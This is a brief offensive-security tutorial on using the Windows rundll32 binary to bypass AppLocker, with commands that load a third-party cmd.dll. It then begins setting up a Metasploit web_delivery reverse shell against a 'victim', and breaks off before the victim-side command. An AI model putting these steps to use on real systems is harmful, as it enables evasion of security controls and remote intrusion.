Living Off The Land Binaries And Scripts
LOLBas - Windows utilities
Project link:https://lolbas-project.github.io/#
Rundll32 is a Microsoft binary that can execute code that is inside a DLL file. Since this utility is part of the Windows operating system it can be used as a method in order to bypass AppLocker rules or Software Restriction Policies. So if the environment is not properly lockdown and users are permitted to use this binary then they can write their own DLL’s and bypass any restrictions or execute malicious JavaScript code.
In Windows systems that have locked the command prompt via an AppLocker rule it is possible to bypass this restriction by injecting a malicious DLL file into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file by using an open source variant obtained from the ReactOS.
Download the new cmd: http://didierstevens.com/files/software/cmd-dll_v0_0_4.zip
Since the rundll32 is a trusted Microsoft utility it can be used to load the cmd.dll into a process, execute the code on the DLL and therefore bypass the AppLocker rule and open the command prompt.
The following two commands can be executed from the Windows Run:
rundll32 C:\\cmd.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\\cmd.dll
It possible to utilize the rundll32 binary in order to execute JavaScript code that has an embedded payload and it hosted on a webserver. The Metasploit module web delivery can quickly create a webserver that will serve a specific payload (Python, PHP or PowerShell). In this case the payload will be PowerShell.
Use: exploit/multi/script/web_delivery
Set LHOST as your IP, LPORT port, payload windows/meterperter/reverese_tcp
And run exploit, on the victim: